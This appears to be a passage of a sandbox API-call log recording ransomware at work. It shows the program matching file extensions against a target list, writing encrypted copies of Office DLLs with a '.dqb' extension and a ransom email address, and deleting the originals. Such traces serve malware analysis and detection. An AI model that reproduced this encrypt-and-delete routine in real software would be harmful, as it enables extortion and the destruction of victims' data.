(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString=".jpg") returned 4 [0055.895] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString=".doc") returned 4 [0055.895] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString=".docx") returned 5 [0055.895] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0055.895] lstrlenW (lpString=".pdf") returned 4 [0055.895] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString=".xls") returned 4 [0055.895] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString=".xlsx") returned 5 [0055.895] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0055.895] lstrlenW (lpString=".ppt") returned 4 [0055.895] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString=".zip") returned 4 [0055.895] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString=".rar") returned 4 [0055.895] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.895] lstrlenW (lpString=".bz2") returned 4 [0055.895] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.895] lstrlenW (lpString=".7z") returned 3 [0055.895] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString=".dbf") returned 4 [0055.895] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.895] lstrlenW (lpString=".1cd") returned 4 [0055.895] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.896] lstrlenW (lpString=".jpg") returned 4 [0055.896] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.896] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0055.896] lstrlenW (lpString="ACEERR.DLL") returned 10 [0055.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0055.897] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=43408) returned 1 [0055.897] CloseHandle (hObject=0x168) returned 1 [0055.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 0x20 [0055.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0055.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.897] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.898] GetLastError () returned 0x0 [0055.898] ReadFile (in: hFile=0x168, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xa990, lpOverlapped=0x0) returned 1 [0055.900] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xa9a0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xa9a0, lpOverlapped=0x0) returned 1 [0055.902] ReadFile (in: hFile=0x168, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.902] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0055.902] SetEndOfFile (hFile=0x214) returned 1 [0055.902] CloseHandle (hObject=0x214) returned 1 [0055.903] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.903] SetEndOfFile (hFile=0x168) returned 1 [0055.904] CloseHandle (hObject=0x168) returned 1 [0055.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.904] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 1 [0055.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.904] lstrlenW (lpString=".doc") returned 4 [0055.904] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.904] lstrlenW (lpString=".docx") returned 5 [0055.904] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0055.904] lstrlenW (lpString=".pdf") returned 4 [0055.904] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.904] lstrlenW (lpString=".xls") returned 4 [0055.904] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.904] lstrlenW (lpString=".xlsx") returned 5 [0055.904] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0055.904] lstrlenW (lpString=".ppt") returned 4 [0055.904] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.904] lstrlenW (lpString=".zip") returned 4 [0055.904] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.904] lstrlenW (lpString=".rar") returned 4 [0055.905] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString=".bz2") returned 4 [0055.905] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.905] lstrlenW (lpString=".7z") returned 3 [0055.905] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString=".dbf") returned 4 [0055.905] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString=".1cd") returned 4 [0055.905] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString=".jpg") returned 4 [0055.905] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString=".doc") returned 4 [0055.905] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString=".docx") returned 5 [0055.905] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0055.905] lstrlenW (lpString=".pdf") returned 4 [0055.905] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString=".xls") returned 4 [0055.905] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString=".xlsx") returned 5 [0055.905] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0055.905] lstrlenW (lpString=".ppt") returned 4 [0055.905] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.905] lstrlenW (lpString=".zip") returned 4 [0055.905] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.905] lstrlenW (lpString=".rar") returned 4 [0055.905] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.906] lstrlenW (lpString=".bz2") returned 4 [0055.906] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.906] lstrlenW (lpString=".7z") returned 3 [0055.906] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.906] lstrlenW (lpString=".dbf") returned 4 [0055.906] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.906] lstrlenW (lpString=".1cd") returned 4 [0055.906] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0055.906] lstrlenW (lpString=".jpg") returned 4 [0055.906] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.906] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0055.906] lstrlenW (lpString="ACEES.DLL") returned 9 [0055.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.907] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1012648) returned 1 [0055.907] CloseHandle (hObject=0x238) returned 1 [0055.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 0x20 [0055.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.907] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.907] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0055.908] GetLastError () returned 0x0 [0055.908] ReadFile (in: hFile=0x238, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xf73a8, lpOverlapped=0x0) returned 1 [0055.929] WriteFile (in: hFile=0x168, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xf73b0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xf73b0, lpOverlapped=0x0) returned 1 [0056.161] ReadFile (in: hFile=0x238, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.161] WriteFile (in: hFile=0x168, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0056.161] SetEndOfFile (hFile=0x168) returned 1 [0056.162] CloseHandle (hObject=0x168) returned 1 [0056.162] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.162] SetEndOfFile (hFile=0x238) returned 1 [0056.170] CloseHandle (hObject=0x238) returned 1 [0056.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.170] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 1 [0056.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.170] lstrlenW (lpString=".doc") returned 4 [0056.170] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.170] lstrlenW (lpString=".docx") returned 5 [0056.170] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0056.170] lstrlenW (lpString=".pdf") returned 4 [0056.171] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".xls") returned 4 [0056.171] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".xlsx") returned 5 [0056.171] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0056.171] lstrlenW (lpString=".ppt") returned 4 [0056.171] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString=".zip") returned 4 [0056.171] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".rar") returned 4 [0056.171] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".bz2") returned 4 [0056.171] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.171] lstrlenW (lpString=".7z") returned 3 [0056.171] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString=".dbf") returned 4 [0056.171] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString=".1cd") returned 4 [0056.171] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString=".jpg") returned 4 [0056.171] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.171] lstrlenW (lpString=".doc") returned 4 [0056.171] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".docx") returned 5 [0056.171] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0056.171] lstrlenW (lpString=".pdf") returned 4 [0056.171] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.171] lstrlenW (lpString=".xls") returned 4 [0056.172] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.172] lstrlenW (lpString=".xlsx") returned 5 [0056.172] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0056.172] lstrlenW (lpString=".ppt") returned 4 [0056.172] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.172] lstrlenW (lpString=".zip") returned 4 [0056.172] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.172] lstrlenW (lpString=".rar") returned 4 [0056.172] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.172] lstrlenW (lpString=".bz2") returned 4 [0056.172] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.172] lstrlenW (lpString=".7z") returned 3 [0056.172] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.172] lstrlenW (lpString=".dbf") returned 4 [0056.172] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.172] lstrlenW (lpString=".1cd") returned 4 [0056.172] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 65 [0056.172] lstrlenW (lpString=".jpg") returned 4 [0056.172] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.172] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.172] lstrlenW (lpString="ACEODBC.DLL") returned 11 [0056.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.173] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=342960) returned 1 [0056.173] CloseHandle (hObject=0x238) returned 1 [0056.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 0x20 [0056.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.173] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.173] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0056.174] GetLastError () returned 0x0 [0056.174] ReadFile (in: hFile=0x238, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x53bb0, lpOverlapped=0x0) returned 1 [0056.181] WriteFile (in: hFile=0x168, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x53bc0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x53bc0, lpOverlapped=0x0) returned 1 [0056.455] ReadFile (in: hFile=0x238, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.455] WriteFile (in: hFile=0x168, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.455] SetEndOfFile (hFile=0x168) returned 1 [0056.577] CloseHandle (hObject=0x168) returned 1 [0056.577] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.578] SetEndOfFile (hFile=0x238) returned 1 [0056.581] CloseHandle (hObject=0x238) returned 1 [0056.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.581] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 1 [0057.024] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.025] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.027] lstrlenW (lpString=".doc") returned 4 [0057.029] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.031] lstrlenW (lpString=".docx") returned 5 [0057.032] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0057.034] lstrlenW (lpString=".pdf") returned 4 [0057.035] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.036] lstrlenW (lpString=".xls") returned 4 [0057.036] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.037] lstrlenW (lpString=".xlsx") returned 5 [0057.038] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0057.039] lstrlenW (lpString=".ppt") returned 4 [0057.040] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.046] lstrlenW (lpString=".zip") returned 4 [0057.047] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.048] lstrlenW (lpString=".rar") returned 4 [0057.050] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.051] lstrlenW (lpString=".bz2") returned 4 [0057.052] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.053] lstrlenW (lpString=".7z") returned 3 [0057.054] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.055] lstrlenW (lpString=".dbf") returned 4 [0057.058] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.060] lstrlenW (lpString=".1cd") returned 4 [0057.061] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.063] lstrlenW (lpString=".jpg") returned 4 [0057.064] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0057.070] lstrlenW (lpString=".doc") returned 4 [0057.071] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.072] lstrlenW (lpString=".docx") returned 5 [0057.073] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0057.074] lstrlenW (lpString=".pdf") returned 4 [0057.076] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.078] lstrlenW (lpString=".xls") returned 4 [0057.079] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.080] lstrlenW 